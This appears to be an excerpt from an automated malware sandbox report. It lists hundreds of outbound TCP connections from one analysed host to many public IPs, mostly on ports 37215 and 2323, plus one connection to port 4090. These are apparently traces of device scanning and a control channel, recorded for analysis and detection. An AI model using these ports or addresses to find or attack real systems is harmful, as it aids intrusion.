          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.217.239.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 162.189.159.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.126.181.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.155.18.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.55.193.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 32.70.63.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 207.230.18.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.42.140.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.193.222.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.212.119.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.157.26.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.188.130.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 25.220.131.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.69.170.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 178.64.112.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.170.92.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.179.57.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.105.159.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 109.169.161.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 165.13.117.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.4.171.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 207.124.200.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.60.71.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.203.50.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 150.104.69.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.108.181.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.179.158.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.125.35.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.226.15.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.199.221.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.41.111.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.192.243.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 203.30.50.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.152.77.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 156.140.83.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.249.66.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 204.143.20.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.213.7.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.115.50.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.69.250.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 202.213.139.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.237.254.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 217.81.237.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.1.165.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.213.47.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.248.136.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.29.141.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.199.21.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.147.162.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 96.59.61.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.61.194.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.156.60.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.97.187.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.173.85.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.179.102.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.238.137.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.201.212.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.192.167.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.176.11.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.112.7.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.235.85.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.221.137.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.125.59.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.63.168.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 119.96.193.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.38.70.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 38.109.69.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.219.2.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 185.235.202.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.232.90.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.186.114.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 212.214.148.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 146.88.125.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.59.143.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 83.218.156.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 206.165.1.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.170.16.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.226.128.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.51.91.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.171.105.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.73.121.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.107.66.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.193.208.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 171.136.159.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 19.107.252.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.120.87.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 120.115.28.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.156.52.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.51.36.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.169.250.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.188.59.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.60.75.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.85.114.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.233.38.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.249.12.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.246.161.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 87.138.213.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.4.108.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.240.224.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 195.65.4.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 113.254.112.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.59.1.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 90.94.178.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.233.70.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 122.0.110.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.232.135.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.189.87.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.160.4.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.226.16.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.163.208.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.177.106.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.216.152.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.255.96.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.55.241.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 112.32.105.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.202.6.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.129.103.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.20.208.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.134.201.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.210.67.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.24.242.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.128.54.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 202.205.99.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.156.76.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.190.250.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 145.29.163.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.32.140.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.89.199.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.46.110.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.41.21.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.28.58.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.227.38.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.50.149.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.45.216.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.187.195.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.94.49.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.104.189.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.188.70.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 126.155.60.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.105.228.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.132.171.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.119.82.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.71.234.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.229.70.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.12.139.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.54.209.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.194.123.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.114.133.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.33.247.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 76.38.247.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.68.115.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.71.75.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.208.197.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.187.189.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.238.14.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 115.100.165.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.96.114.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 122.98.81.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.220.218.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.185.177.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.207.227.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.15.244.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.175.88.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.106.176.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 207.190.136.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.63.89.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.101.153.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.23.60.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.250.40.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.113.179.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.197.76.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.205.154.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.230.86.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.161.198.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.108.17.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.157.42.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.75.11.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.93.99.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.105.51.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.34.55.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.191.22.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.239.227.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.86.122.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.254.87.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.134.15.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.9.83.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 64.141.234.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.151.76.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.180.220.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.91.63.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.45.42.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 35.199.196.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 83.157.255.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.143.106.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.235.131.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 218.208.234.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 148.173.73.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.50.51.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.212.41.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.86.95.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 89.67.28.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.230.67.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 134.149.108.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.225.15.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.56.134.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.67.91.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.109.35.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.114.128.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.40.92.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 105.161.92.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.187.77.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.244.138.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.80.123.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.29.250.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.9.102.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.194.199.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 139.202.38.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.232.190.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 45.76.153.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 98.190.70.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.89.45.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 94.220.26.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.243.209.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.139.151.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.205.200.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 136.72.146.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.184.29.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.181.187.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.121.114.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.49.130.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.66.49.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 87.168.196.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.123.164.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.33.252.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.140.191.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 138.83.56.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.136.6.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.91.71.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 92.133.193.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.113.157.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.167.80.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.24.190.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.79.109.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.195.31.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.117.195.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.32.92.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.13.3.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 191.252.184.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 62.69.134.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 200.204.67.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.183.120.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 173.143.147.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 83.20.132.207:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 171.181.61.139:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 185.137.201.36:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 170.81.144.16:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 63.35.57.233:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 99.212.117.85:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 81.148.39.205:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 97.252.100.196:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 130.243.191.56:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 129.219.218.62:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 99.232.206.27:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 155.164.167.251:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 12.157.241.64:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 1.104.73.86:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 218.184.94.231:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 125.12.217.204:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 157.28.101.21:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 146.184.146.105:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 105.221.9.196:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 128.240.49.135:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 73.97.119.85:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 156.239.26.70:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 160.3.50.129:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 191.75.214.221:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 43.45.116.233:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 160.113.211.165:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 165.1.185.89:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 93.115.218.91:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 124.98.160.183:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 109.142.19.190:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 76.2.246.90:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 160.67.16.245:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 149.191.59.236:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 203.104.99.3:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 207.238.209.249:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 83.35.35.220:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 106.28.174.95:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 167.18.245.12:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 38.157.113.105:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 204.24.6.218:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 202.135.185.138:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 212.107.168.28:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 69.180.211.109:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 108.69.99.18:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 42.166.251.244:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 19.57.190.44:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 108.213.65.187:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 139.55.14.212:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 155.151.146.52:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 95.156.132.185:2323
          Source: global trafficTCP traffic: 192.168.2.23:9670 -> 119.236.199.78:2323
          Source: global trafficTCP traffic: 192.168.2.23:58058 -> 91.92.249.80:4090
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.152.183.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.175.184.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.176.193.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.27.167.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.47.87.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.96.111.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 49.88.113.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 119.193.17.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 124.52.233.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.248.99.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.30.141.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.215.33.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.207.244.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.29.88.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.81.111.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.140.202.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 189.84.251.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.228.94.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.64.168.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.103.216.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.115.60.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 148.234.42.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.82.118.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.208.93.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.217.217.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.64.55.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.169.112.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.155.61.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.75.210.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.150.35.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.247.122.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 156.102.160.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 99.118.121.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 73.13.32.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.252.239.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.142.63.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.210.134.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.209.164.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.39.27.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.17.216.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.184.154.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 161.209.166.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 150.221.57.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.207.113.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 134.239.241.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 173.241.30.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 193.191.250.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 107.151.34.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.114.48.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.155.230.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.154.56.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.55.0.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.79.31.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 101.158.98.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.41.240.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.65.37.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 99.246.133.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.208.124.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.37.212.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.246.134.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.247.83.123:37215
